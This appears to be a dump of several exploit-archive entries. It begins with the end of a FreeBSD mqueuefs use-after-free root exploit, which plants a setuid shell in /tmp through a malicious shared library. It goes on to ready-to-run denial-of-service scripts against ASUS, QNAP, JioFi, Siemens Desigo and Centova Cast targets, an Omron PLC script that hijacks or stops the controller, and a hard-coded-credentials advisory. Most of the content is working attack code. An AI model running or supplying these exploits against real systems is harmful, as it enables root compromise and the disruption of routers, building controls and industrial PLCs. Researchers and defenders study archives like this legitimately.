int fd, fd2, fd3, trigger_fd;
u_int32_t i;
struct mq_attr attrs;
attrs.mq_maxmsg = 10;
attrs.mq_msgsize = sizeof(int);
printf("[+] Start UaF preparation\n");
printf("[+] This can take a while\n");
// Open a mqueue file
fd = mq_open("/pwn_mq", O_RDWR | O_CREAT, 0666, &attrs);
if (fd == -1) {
perror("open");
exit(1);
}
// fp->f_count will be incremented by 1 per iteration due
// to the bug in freebsd32_kmq_timedsend()
//
// That is, 0xfffffffe iterations will increment it to
// 0xffffffff (f_count starts with 1 because of mq_open())
//
// The bug is triggered because freebsd_kqm_timedsend will eventually
// try to call copyin() with the pointer to address 0x1 which
// is invalid
for (i = 0; i < 0xfffffffe; i++) {
// just a progress message, nothing special about the magic values
if (i % 0x19999990 == 0)
printf("[+] Progress: %d%%\n", (u_int32_t) (i / 0x28f5c28));
mq_timedsend(fd, NULL, 0, 0, (const struct timespec *)0x1);
}
// Every dup() increases fp->f_count by 1
//
// Using dup() works because FreeBSD's mqueue implementation
// is implemented by using file objects (struct file) internally.
//
// This circumvents an infinite loop in fget_unlocked() as dup()
// does not use _fget() but fhold() to increase the counter.
fd2 = dup(fd);
if (fd2 == -1) {
perror("dup");
exit(1);
}
fd3 = dup(fd);
if (fd3 == -1) {
perror("dup");
exit(1);
}
// Close the mqueue file to trigger a free operation
//
// The descriptors fd2 and fd3 will still point
// to the freed object
//
// Opening another file will render these descriptors
// to point the newly opened file
close(fd);
trigger_fd = open_tmp(NULL);
fds[0] = trigger_fd;
fds[1] = fd2;
fds[2] = fd3;
printf("[+] Finished UaF preparation\n");
}
// This function will monitor that all
// hammer threads are opened
void read_thread_status(int server_socket) {
int bytes_rec, count;
struct sockaddr_un client;
socklen_t len;
char buf[256];
struct timeval tv;
tv.tv_sec = 10;
tv.tv_usec = 0;
setsockopt(server_socket,
SOL_SOCKET, SO_RCVTIMEO,
(const char*)&tv, sizeof tv);
for (count = 0; count < NUM_FORKS*NUM_THREADS; count++) {
if (count % 100 == 0) {
printf("[+] Hammer threads ready: %d\n", count);
}
bzero(&client, sizeof(struct sockaddr_un));
bzero(buf, 256);
len = sizeof(struct sockaddr_un);
if ((bytes_rec = recvfrom(server_socket,
buf, 256, 0,
(struct sockaddr *) &client,
&len)) == -1) {
perror("[!] recvfrom");
break;
}
}
if (count != NUM_FORKS * NUM_THREADS) {
printf("[!] Could not create all hammer threads, will try though!\n");
}
}
// This function will execute the whole exploit
void fire() {
int i, j, fd, fd2, fd3, bytes_rec, server_socket;
int sv[2], fds[3], hammer_socket[NUM_FORKS];
int *fd_ptr;
char socket_path[256], sync_buf[3], buf[256];
pthread_t write_thread, trigger_thread, monitor_thread;
pthread_t hammer_threads[NUM_THREADS];
pid_t pids[NUM_FORKS];
socklen_t len;
struct thread_data thread_data;
struct sockaddr_un server, client;
struct sockaddr_un hammer_socket_addr[NUM_FORKS];
// Socket for receiving thread status
unlink(SERVER_PATH);
prepare_domain_socket(&server, SERVER_PATH);
server_socket = bind_domain_socket(&server);
// Sockets to receive hammer signal
for (i = 0; i < NUM_FORKS; i++) {
snprintf(socket_path, sizeof(socket_path), "%s%c", SERVER_PATH, '1'+i);
unlink(socket_path);
prepare_domain_socket(&hammer_socket_addr[i], socket_path);
hammer_socket[i] = bind_domain_socket(&hammer_socket_addr[i]);
}
strncpy(sync_buf, "1\n", 3);
len = sizeof(struct sockaddr_un);
if (socketpair(PF_UNIX, SOCK_STREAM, 0, sv) == -1) {
perror("[!] socketpair");
exit(1);
}
pthread_mutex_init(&write_mtx, NULL);
pthread_mutex_init(&trigger_mtx, NULL);
pthread_cond_init(&write_cond, NULL);
pthread_cond_init(&trigger_cond, NULL);
// Create the thread to monitor the number of
// dirty buffers directly in the beginning
// to be ready when needed
pthread_create(&monitor_thread, NULL, monitor_dirty_buffers, NULL);
// Prepare the UaF using the 0day
prepare(fds);
fd = fds[0];
fd2 = fds[1];
fd3 = fds[2];
// Create the threads which will execute the exploit
thread_data.fd = fd;
thread_data.fd2 = fd2;
pthread_create(&trigger_thread, NULL, trigger_uaf, (void *) &thread_data);
pthread_create(&write_thread, NULL, write_to_file, (void *) &thread_data);
for (j = 0; j < NUM_FORKS; j++) {
if ((pids[j] = fork()) < 0) {
perror("[!] fork");
abort();
}
else if (pids[j] == 0) {
// Close the file descriptors
// becasue each fork will have an own reference
// to the file object, thus increasing the
// reference counter
close(fd);
close(fd2);
close(fd3);
pthread_mutex_init(&hammer_mtx, NULL);
pthread_cond_init(&hammer_cond, NULL);
// Create the hammer threads
for (i = 0; i < NUM_THREADS; i++) {
pthread_create(&hammer_threads[i], NULL, hammer, NULL);
}
printf("[+] Fork %d created all threads\n", j);
// Wait for the signal to start hammering from the parent
if ((bytes_rec = recvfrom(hammer_socket[j],
buf, 256, 0,
(struct sockaddr *) &client,
&len)) == -1) {
perror("[!] accept");
abort();
}
// Broadcast to the hammer threads to
// start hammering
pthread_cond_broadcast(&hammer_cond);
// Wait for the hammer threads
for (i = 0; i < NUM_THREADS; i++) {
pthread_join(hammer_threads[i], NULL);
}
pthread_cond_destroy(&hammer_cond);
pthread_mutex_destroy(&hammer_mtx);
exit(0);
} else {
printf("[+] Created child with PID %d\n", pids[j]);
}
}
// Wait for the preparation of all hammer threads
// in the forks.
//
// If all are prepared, send a signal to the childs
// to start the hammering process to create dirty
// buffers.
read_thread_status(server_socket);
printf("[+] Send signal to Start Hammering\n");
for (i = 0; i < NUM_FORKS; i++) {
if (sendto(hammer_socket[i],
sync_buf,
strlen(sync_buf), 0,
(struct sockaddr *) &hammer_socket_addr[i],
sizeof(hammer_socket_addr[0])) == -1) {
perror("[!] sendto");
exit(1);
}
}
// Wait for all threads to finish
pthread_join(monitor_thread, NULL);
for (i = 0; i < NUM_FORKS; i++) {
kill(pids[i], SIGKILL);
printf("[+] Killed %d\n", pids[i]);
}
pthread_join(write_thread, (void **) &fd_ptr);
pthread_join(trigger_thread, NULL);
pthread_mutex_destroy(&write_mtx);
pthread_mutex_destroy(&trigger_mtx);
pthread_cond_destroy(&write_cond);
pthread_cond_destroy(&trigger_cond);
// Prevent a kernel panic
prevent_panic(*fd_ptr);
// fd was acquired from write_to_file
// which allocs a pointer for it
free(fd_ptr);
}
int main(int argc, char **argv)
{
setbuf(stdout, NULL);
fire();
return 0;
}
EOF
# Compile with -m32 to exploit FreeBSD-SA-19:24.mqueuefs
cc -o exploit -lpthread exploit.c
# cc -o exploit -m32 -lpthread exploit.c
cat > program.c << EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init()
{
if (!geteuid())
execl("/bin/sh","sh","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL);
}
EOF
# Compile the shared library object
cc -o program.o -c program.c -fPIC
cc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
# Start the exploit
#
# su will execute the shared library object
# that creates the shell binary copy
echo "[+] Firing the Exploit"
./exploit
su
# Ensure that everything has worked
# and execute the root-shell
if [ -f /tmp/xxxx ]; then
echo "[+] Enjoy!"
echo "[+] Do not forget to copy ./libmap.conf back to /etc/libmap.conf"
/tmp/xxxx
else
echo "[!] FAIL"
fi

34
exploits/hardware/dos/46720.sh Executable file
View file

@ -0,0 +1,34 @@
# Exploit Title:ASUS HG100 devices denial of service(DOS) via IPv4 packets/SlowHTTPDOS
# Date: 2019-04-14 # Exploit Author: YinT Wang;
# Vendor Homepage: www.asus.com
# Version: Hardware version: HG100 、Firmware version: 1.05.12
# Tested on: Currnet 1.05.12
# CVE : CVE-2018-11492
1. Description
The attack at same Local-Network-area could crash the device via the Hping3 or Slowhttptest(which is not include in the CVE-2018-11492).
2.Proof of Concept
Just Execute the following script in kali which could crash the devices
1. IPv4 packet and in result of devices crash.which written in linux script.
#needed to co-operate with hping3 tool
#with the time period at least 220s which could cause web server of HG100 devices crash
#!/bin/bash
read -p "enter the ip of HG100 here " url
hping3 -V -c 10000 -S -w 64 --flood --rand-source $url
sleep 220
echo "Hping3 V c 10000 S w 64 flood rand-source $url time 220s"
exit 0
2.Slowhttp test and caused the devices crash.which written in linux script.
#needed to co-operate with slowhttptest tool
#with the time period 600s which could cause web server of HG100 devices crash
#!/bin/bash
read -p "enter the ip of HG100 with port here ex: http://x.x.x.x:123 " url
slowhttptest -H -R -c 10000 -l 600 -u $url
sleep 600
echo "slowhttptest -H -R -c 10000 -l 600 -u $url time 600s"
exit 0

29
exploits/hardware/dos/46733.py Executable file
View file

@ -0,0 +1,29 @@
#!/usr/bin/python
# Exploit Title: QNAP myQNAPcloud Connect "Username/Password" DOS
# Date: 19/04/2019
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: https://www.qnap.com
# Version: 1.3.4.0317 and below are vulnerable
# Software Link: https://www.qnap.com/en/utilities/essentials
# Contact: services[@]telspace.co.za
# Twitter: @telspacesystems (Greets to the Telspace Crew)
# Tested on: Windows XP/7/10 (version 1.3.3.0925)
# CVE: CVE-2019-7181
# POC
# 1.) Generate qnap.txt
# 2.) Copy the contents of qnap.txt to the clipboard
# 3.) Paste the contents in any username/password field(Add or Edit VPN)
# 4.) Click ok, program crashes.
# This vulnerability was responsibly disclosed February 3, 2019, new version has been released.
buffer = "A" * 1000
payload = buffer
try:
f=open("qnap.txt","w")
print "[+] Creating %s bytes QNAP payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

66
exploits/hardware/dos/46752.txt Normal file
View file

@ -0,0 +1,66 @@
# Exploit Title: cgi-bin/qcmap_web_cgi on JioFi 4G M2S 1.0.2 devices allows a DoS (Hang) via the mask POST parameter
# Exploit Author: Vikas Chaudhary
# Date: 21-01-2019
# Vendor Homepage: https://www.jio.com/
# Hardware Link: https://www.amazon.in/JioFi-Hotspot-M2S-Portable-Device/dp/B075P7BLV5/ref=sr_1_1?s=computers&ie=UTF8&qid=1531032476&sr=1-1&keywords=JioFi+M2S+Wireless+Data+Card++%28Black%29
# Version: JioFi 4G Hotspot M2S 150 Mbps Wireless Router
# Category: Hardware
# Contact: https://www.facebook.com/profile.php?id=100011287630308
# Web: https://gkaim.com/
# Tested on: Windows 10 X64- Firefox-65.0
# CVE-2019-7439
***********************************************************************
## Vulnerability Description :- A denial-of-service attack (DoS attack) is a cyber-attack in which the perpetrator seeks to make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting services of a host connected to the Internet. Denial of service is typically accomplished by flooding the targeted machine or resource with superfluous requests in an attempt to overload systems and prevent some or all legitimate requests from being fulfilled.
----------------------------------------
# Proof Of Concept:
1- First Open BurpSuite
2- Make Intercept on
3 -Go to your Wifi Router's Gateway in Browser [i.e http://192.168.225.1 ]
4-Capture the data and then Spider the Host
5- Now You find a Link like this [ http://192.168.225.1/cgi-bin/qcmap_web_cgi ]
6- Send it to repeter Now you will find parameter like this [ Page=GetWANInfo&mask=0&token=0 ]
7-Vulnerable parameter is => mash
8-Paste this PAYLOD in mask parameter and then show Response in browser
Payload =>
<iframe src="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;"></iframe>
9-Now it will show => {"commit":"Socket Connect Error"}
10-- It Means Router is Completely Stopped ,
----------------------------------------
Vulnerable URL => Post Based => http://192.168.225.1/cgi-bin/qcmap_web_cgi => mask parameter
-----------------------------------------
Solution:-
You have to Remove your battery and then again insert it to make Normal.
-----------------------------------------------------------------------------------
REQUEST
------------
POST /cgi-bin/qcmap_web_cgi HTTP/1.1
Host: 192.168.225.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.225.1/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 167
Connection: close
Page=GetWANInfo&mask=<iframe src="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;"></iframe>&token=0
****************************
RESPONSE
----------
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
X-Frame-Options: SAMEORIGIN
connection: close
Content-Type: text/html
Content-Length: 33
Date: Mon, 21 Jan 2019 18:17:34 GMT
Server: lighttpd/1.4.35
{"commit":"Socket Connect Error"}
---------------------------------------------------------------------------------------------------------------

109
exploits/hardware/dos/47657.txt Normal file
View file

@ -0,0 +1,109 @@
# Title: Siemens Desigo PX 6.00 - Denial of Service (PoC)
# Author: LiquidWorm
# Date: 2019-11-14
# Vendor web page: https://www.siemens.com
# Product web page: https://new.siemens.com/global/en/products/buildings/automation/desigo.html
# Affected version:6.00
# Affected version: Model: PXC00-E.D, PXC50-E.D, PXC100-E.D, PXC200-E.D
# With Desigo PX Web modules: PXA40-W0, PXA40-W1, PXA40-W2
# All firmware versions < V6.00.320
# ------
# Model: PXC00-U, PXC64-U, PXC128-U
# With Desigo PX Web modules: PXA30-W0, PXA30-W1, PXA30-W2
# All firmware versions < V6.00.320
# ------
# Model: PXC22.1-E.D, PXC36-E.D, PXC36.1-E.D
# With activated web server
# All firmware versions < V6.00.320
# CVE: N/A
# Advisory ID: ZSL-2019-5542
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5542.php
#!/bin/bash
#
#
# Siemens Desigo PX V6.00 Web Remote Denial of Service Exploit
#
#
# Vendor: Siemens AG
# Vendor web page: https://www.siemens.com
# Product web page: https://new.siemens.com/global/en/products/buildings/automation/desigo.html
#
# Summary: Desigo PX is a modern building automation and control
# system for the entire field of building service plants. Scalable
# from small to large projects with highest degree of energy efficiency,
# openness and user-friendly operation.
#
# Desc: The device contains a vulnerability that could allow an attacker
# to cause a denial of service condition on the device's web server
# by sending a specially crafted HTTP message to the web server port
# (tcp/80). The security vulnerability could be exploited by an attacker
# with network access to an affected device. Successful exploitation
# requires no system privileges and no user interaction. An attacker
# could use the vulnerability to compromise the availability of the
# device's web service. While the device itself stays operational, the
# web server responds with HTTP status code 404 (Not found) to any further
# request. A reboot is required to recover the web interface.
#
# Tested on: HP StorageWorks MSL4048 httpd
#
# ================================================================================
# Expected result after sending the directory traversal sequence: /dir?dir=../../:
# --------------------------------------------------------------------------------
#
# $ curl http://10.0.0.17/index.htm
# <HEAD><TITLE>404 Not Found</TITLE></HEAD>
# <BODY><H1>404 Not Found</H1>
# Url '/INDEX.HTM' not found on server<P>
# </BODY>
#
# ================================================================================
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Zero Science Lab - https://www.zeroscience.mk
# @zeroscience
#
#
#
# Vendor ID: SSA-898181
# Vendor Fix: https://support.industry.siemens.com/cs/document/109772802
# Vendor Advisory PDF: https://cert-portal.siemens.com/productcert/pdf/ssa-898181.pdf
# Vendor Advisory TXT: https://cert-portal.siemens.com/productcert/txt/ssa-898181.txt
# Vendor ACK: https://new.siemens.com/global/en/products/services/cert/hall-of-thanks.html
#
# CWE ID: CWE-472: External Control of Assumed-Immutable Web Parameter
# CWE URL: https://cwe.mitre.org/data/definitions/472.html
# CVE ID: CVE-2019-13927
# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13927
# CVSS v3.1 Base Score: 5.3
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:H/RL:O/RC:C
#
#
# 06.06.2019
#
echo -ne "\n----------------------------------"
echo -ne "\nSiemens Desigo PX HTTP Web RMI DoS"
echo -ne "\n----------------------------------\n"
if [ "$#" -ne 1 ]; then
echo -ne "\nUsage: $0 [ipaddr]\n\n"
exit
fi
IP=$1
TARGET="http://$IP/"
PAYLOAD=`echo -ne "\x64\x69\x72\x3f\x64\x69\x72\x3d\x2e\x2e\x2f\x2e\x2e\x2f"`
echo -ne "\n[+] Sending payload to $IP on port 80."
curl -s "$TARGET$PAYLOAD" > /dev/null
echo -ne "\n[*] Done"
echo -ne "\n[+] Checking if exploit was successful..."
status=$(curl -Is http://$IP/index.htm 2>/dev/null | head -1 | awk -F" " '{print $2}')
if [ "$status" == "404" ]; then
echo -ne "\n[*] Exploit successful!\n"
else
echo -ne "\n[-] Exploit unsuccessful.\n"
exit
fi

32
exploits/hardware/dos/47677.sh Executable file
View file

@ -0,0 +1,32 @@
# Exploit Title: Centova Cast 3.2.12 - Denial of Service (PoC)
# Date: 2019-11-18
# Exploit Author: DroidU
# Vendor Homepage: https://centova.com
# Affected Version: <=v3.2.12
# Tested on: Debian 9, CentOS 7
# ===============================================
# The Centova Cast becomes out of control and causes 100% CPU load on all cores.
#!/bin/bash
if [ "$3" = "" ]
then
echo "Usage: $0 centovacast_url reseller/admin password"
exit
fi
url=$1
reseller=$2
pass=$3
dwn() {
echo -n .
curl -s -k --connect-timeout 5 -m 5 "$url/api.php?xm=system.database&f=json&a\[username\]=&a\[password\]=$reseller|$pass&a\[action\]=export&a\[filename\]=/dev/zero" &
}
for i in {0..32}
do
dwn /dev/zero
sleep .1
done
echo "
Done!"

197
exploits/hardware/dos/47757.py Executable file
View file

@ -0,0 +1,197 @@
# Exploit Title: Omron PLC 1.0.0 - Denial of Service (PoC)
# Google Dork: n/a
# Date: 2019-12-06
# Exploit Author: n0b0dy
# Vendor Homepage: https://automation.omron.com, ia.omron.com
# Software Link: n/a
# Version: 1.0.0
# Tested on: PLC f/w rev.: CJ2M (v2.01)
# CWE-412 : Unrestricted Externally Accessible Lock
# CVE : n/a
#!usr/bin/python
######################################################################################################
# #
# `-:+oyhdmmNNNNNNNNmdhyso/:. #
# -/shmNmhyo+/:-..`````..--:/oshdNNdyo:. #
# `:ohNmho/-` .:+ydNmy+. #
# .+hNms/. `:ohNms:` #
# .+dNh+. `/ymNy: #
# :yNd+. `/yNmo. #
# `/dNy-` .+mNy- #
# +mmo. `/dNy- #
# :dNo` ``........--.......``` `/dNs. #
# .yNy. .- ``....```....``..``....```...`` `-` `+Nm/ #
# /mm: ./ymy. `...`` `..` `` .` `` `..` `...` +mho:` .yMh. #
# `sNy. `.`/hNMNo` `..` `.` .` .` `` `.. `...` -dMNmo... `+Nm: #
# `yNo` -yy-sMMMh- ......```.` .` .` `` .-...`` `..` `+NMMm:+h+` :mN/ #
# `hN/ +Nm.sMMh/: `.. `.....```..` `//+yy+.``.``...`..` `.. ./oNMm-oMh. -dN+ #
# `hN+ `/MMo:Nh:/h- `..` .. `..```oMy.:NMd```. .. `.` ys:omh.NMh` .mM/ #
# yM+ `o-hMN.:+sdm/ `-. .. .` ./-./NNo .` .. `.` .hmy+/`sMM-o- -mN: #
# +My .dd`mMy/hNmo. `-````` `. `- :ho. `. .. ````.. `/hNmo/NM//N/ :Mm` #
# .mm. sMd`mMmNd+/` `-` ``..-.``` .. +. .` ``.-...`` .. :/yNNNM/:MN` sMs #
# yM+ `mMm`mMm+-ss `-` ..```.....-....```-o+.```...-.....```.-` .` -h/:yMM/+MM/ .mN- #
# .Nm` `NMN`yo/yNd. .. -` `-```````yNm-```````. `-` `. oNd++h:sMM+ oMy #
# +Mo `.NMM.:hNMd. `-` `. .- `:- `- .. .` `oNMmo`yMM+. .NN` #
# hN- y:hMMoNMmo. .. .` .. .` - `- `. /hMMydMM-h. dM/ #
# .mm`-No-NMMMy-o: .. .` .. .://-` ` -` `-` - y-+mMMMy.Ns sMs #
# :Nd :Mm.oMMo.sN. ..`````````-`````````..`./s` :smds: :s:``-`````````-.`````````-` ym--NMm.sMh +Mh #
# +Mh -NMy`hd-hMd` ..`````````-```````.-/+smMy -my` `dNho/.````````-``````````- /Mm/+N:-NMs /Mh #
# /Nh hMM/-/hMM/ .. .` `+yhdmmNMMMM. .so` yMMMNmhyso+/.`-` `- `mMN/+.dMM- /Mh #
# -Nd` -NMm-+MMh. `. .` oMMMMMMMMMMN` `hy yMMMMMMMMMMMd.- `. `/MMd`yMMy oMy #
# `mN.`.oNMhyMN-o/ -` `.`mMMMMMMMMMMM- -NN. `dMMMMMMMMMMMM/. .` `y`hMNoMMh.- yMo #
# yM:.h./mMMMs dm` `. .+MMMMMMMMMMMMo /MM/ :NMMMMMMMMMMMMs` `. oN--NMMNy.+o`mM- #
# /My`dd/-yNM:.NM+ .. ``.hMMMMMMMMMMMMN- oMMo `hMMMMMMMMMMMMMh.` `.` `mMo`dMm/-yN/:Mm` #
# `mN./MMh-/d/+MMs .` ``````.NMMMMMMMMMMMMMm- sMMs oMMMMMMMMMMMMMMm.````` `.` -NMd`ds-omMh`hMo #
# +Ms oNMNo--sMMh`- ..` oMMMMMMMMMMMMMMMm:yMMhoMMMMMMMMMMMMMMMN- `..` `-:MMN.:/dMMd.:Nm. #
# `hN: /NMMm/+MMm`h+ .. mMMMMMMMMMMMMMMMMNNMMMMMMMMMMMMMMMMMMMMo `.` -h-oMMd-yMMMy.`dM/ #
# -Nm. +yNMMdNMN-/Ms` `.` -MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMh .. :mh`hMMdNMNdo- sMy #
# /Nh`:y+odNMMMo`mMy ..`/MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMm``.` :NM/.NMMMmy+os`oMd. #
# +Mh`+Nh//odNm`oMM+ `.sMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMN.` .mMN`oNmy+/smh`+Mm. #
# +Nh./mMNho++-.mMN/-/` hMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM- `-:.dMMo`+++ymMNs.oNd- #
# /Nd-.omMMMmy+/dMN//ds-hMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM//hy-dMNs:sdMMMNh:`sMh. #
# -dN+``/ymNMMNdmMMo/mNdNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNMs:mMNdmMMNmh+. -dMs` #
# `yNy. /o+/oyhmmNNy:hNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMm//mNNmdys+/+o.`oNm/ #
# :mNo`:dmdyo////+:./yNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMdo--+//:/+shmmo.:dNy. #
# `+mm+.:smNMMMMMMMMNNNNmmMMMMMMMMMMMMMMMMMMMMMMMMMMNhmNNNNMMMMMMMMMNh+.:hNh- #
# `oNmo.`.+ooooo+//:--:yMMMMMMMMMMMMMMMMMMMMMMMMMMmo/--::/++ooooo:``/hNd: #
# `+mNs:.+yso++oshmMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNdys+++oys:.odNh: #
# :yNdo-/sdNNMMMNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMdmNNMMNNmy+:/hNmo. #
# `+hNds:``...`/MMMMMMMMMMMMMMMMMMMMMMMMMMMM: `....`-ohNms: #
# `/ymNds/.`sMMMMMMMMMMMMMMMMMMMMMMMMMMMM+ `:ohNNdo- #
# ./sdNNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMdhmNNho:` #
# `-/oydNMMMMMMMMMMMMMMMMMMMMMMmhy+:. #
# `.://+osyyyyyyso+/:-. #
# #
# #
# Exploit Title: Omron PLC: Denial-of-Service as a Feature #
# Google Dork: n/a #
# Date: 2019.12.06 #
# Exploit Author: n0b0dy #
# Vendor Homepage: https://automation.omron.com, ia.omron.com #
# Software Link: n/a #
# Version: 1.0.0 #
# Tested on: PLC f/w rev.: CJ2M (v2.01) #
# CWE-412 : Unrestricted Externally Accessible Lock #
# CVE : n/a #
# #
#######################################################################################################
import sys, signal, socket, time, binascii
nic = socket.gethostbyname(socket.gethostname()) #will fail if hostname = 'hostname'
if len(sys.argv) < 2:
print "Usage: fins.dos.py [arg.] {target ip} {target port[9600]}"
print "--pwn Hijack control of PLC program."
print "--stop Stop PLC CPU."
else:
ip = sys.argv[2]
try:
port = sys.argv[3]
except:
port = 9600
def ip_validate(ip):
a = ip.split('.')
if len(a) != 4:
return False
for x in a:
if not x.isdigit():
return False
i = int(x)
if i < 0 or i > 255:
return False
return True
#fins header
icf = '\x80' #info control field (flags); 80=resp req, 81=resp not req
rsv = '\x00' #reserved
gct = '\x02' #gateway count
dna = '\x00' #dest net addr
idnn = ip[-1:] #dest node no (last digit of target ip)
dnn_i = '0' + idnn
dnn = binascii.a2b_hex(dnn_i)
dua = '\x00' #dest unit addr
sna = '\x00' #source net addr
isnn = nic[-1:] #source node no (last digit of own ip)
snn_i = '0' + isnn
snn = binascii.a2b_hex(snn_i)
sua = '\x00' #source unit addr
sid = '\x7a' #service ID
fins_hdr = icf + rsv + gct + dna + dnn + dua + sna + snn + sua + sid
#FINS command acceptance code
fins_ok = '\x00'
#Verify PLC type
CmdMRst1 = binascii.a2b_hex("05")
CmdSRst1 = binascii.a2b_hex("01")
Cmdst1 =\
fins_hdr + CmdMRst1 + CmdSRst1 + '\x00'
print "Probing PLC... " + '\t'
s1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s1.sendto(Cmdst1, (ip, port))
print "Finished." + '\r\n'
s1fins_resp = s1.recvfrom(1024)
s1fins_resp_b = bytes(s1fins_resp[0])
if s1fins_resp_b[12] == fins_ok and s1fins_resp_b[13] == fins_ok:
print "FINS target is exploitable: "
print s1fins_resp_b[14:39]
else:
print "FINS target not exploitable."
print "FINS response from target: ", s1fins_resp
if sys.argv[1] == "--pwn":
#access right forced acquire
PgmNo = '\xff'
CmdMRst2 = binascii.a2b_hex("0c")
CmdSRst2 = binascii.a2b_hex("02")
Cmdst2 =\
fins_hdr + CmdMRst2 + CmdSRst2 + PgmNo + PgmNo
reqdly = 1
persist = 1
pwnage = 0
print "Obtaining control of PLC program..." + '\r\n'
while persist == 1:
try:
s2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
time.sleep(reqdly)
s2.sendto(Cmdst2, (ip, port))
s2fins_resp = s2.recvfrom(1024)
s2fins_resp_b = bytes(s2fins_resp[0])
if s2fins_resp_b[12] == fins_ok and s2fins_resp_b[13] == fins_ok:
pwnage += 1
pwntime = str(pwnage)
sys.stdout.write('\r' + "Pwnage in progress! " + "duration: " + pwntime + " sec.")
sys.stdout.flush()
else:
print "Attack unsuccessful. ", '\r\n'
print "FINS error code: ", s2fins_resp
except socket.error as e:
print socket.error
s2.close()
except KeyboardInterrupt:
persist = 0
print '\r', " Attack interrupted by user."
s2.close()
elif sys.argv[1] == "--stop":
#change OP Mode
CmdMRst3 = binascii.a2b_hex("04")
CmdSRst3 = binascii.a2b_hex("02")
Cmdst3 =\
fins_hdr + CmdMRst3 + CmdSRst3
print "Stopping PLC (just for fun)... " + '\t'
s3 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s3.sendto(Cmdst3, (ip, port))
print "Finished. "
s3fins_resp = s3.recvfrom(1024)
s3fins_resp_b = bytes(s3fins_resp[0])
if s3fins_resp_b[12] == fins_ok and s3fins_resp_b[13] == fins_ok:
print "PLC CPU STOP mode confirmed. "
else:
print "Attack unsuccessful. ", '\r\n'
print "FINS response from target: ", s3fins_resp

79
exploits/hardware/local/47763.txt Normal file
View file

@ -0,0 +1,79 @@
# Exploit Title: Inim Electronics Smartliving SmartLAN 6.x - Hard-coded Credentials
# Exploit Author: LiquidWorm
# Date: 2019-12-09
# Product web page: https://www.inim.biz
# Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving?
# Advisory ID: ZSL-2019-5546
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5546.php
Inim Electronics Smartliving SmartLAN/G/SI <=6.x Hard-coded Credentials
Vendor: INIM Electronics s.r.l.
Product web page: https://www.inim.biz
Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving?
Affected version: <=6.x
Affected models: SmartLiving 505
SmartLiving 515
SmartLiving 1050, SmartLiving 1050/G3
SmartLiving 10100L, SmartLiving10100L/G3
Summary: SmartLiving anti-intrusion control panel and security system provides
important features rarely found in residential, commercial or industrial application
systems of its kind. This optimized-performance control panel provides first-rate
features such as: graphic display, text-to-speech, voice notifier, flexible hardware,
end-to-end voice transmission (voice-on-bus), IP connectivity.
SMARTLAN/SI:
The system-on-chip platform used in the SmartLAN/SI accessory board provides point-to-point
networking capability and fast connectivity to the Internet. Therefore, it is possible
to set up a remote connection and program or control the system via the SmartLeague
software application. In effect, the SmartLAN/SI board grants the same level of access
to the system as a local RS232 connection.
SMARTLAN/G:
The SmartLAN/G board operates in the same way as the SmartLAN/SI but in addition provides
advanced remote-access and communication functions. The SmartLAN/G board is capable of
sending event-related e-mails automatically. Each e-mail can be associated with a subject,
an attachment and a text message. The attachment can be of any kind and is saved to an
SD card. The message text can contain direct links to domains or IP addressable devices,
such as a security cameras. In addition to e-mails, the SmartLAN/G board offers users
global access to their control panels via any Internet browser accessed through a PC,
PDA or Smartphone. In fact, the SmartLAN/G has an integrated web-server capable of
distinguishing the means of connection and as a result provides an appropriate web-page
for the tool in use. Smartphones can control the system in much the same way as a
household keypad, from inside the house or from any part of the world.
Desc: The devices utilizes hard-coded credentials within its Linux distribution image.
These sets of credentials (Telnet, SSH, FTP) are never exposed to the end-user and cannot
be changed through any normal operation of the smart home device. Attacker could exploit
this vulnerability by logging in and gain system access.
Tested on: GNU/Linux 3.2.1 armv5tejl
Boa/0.94.14rc21
BusyBox v1.20.2
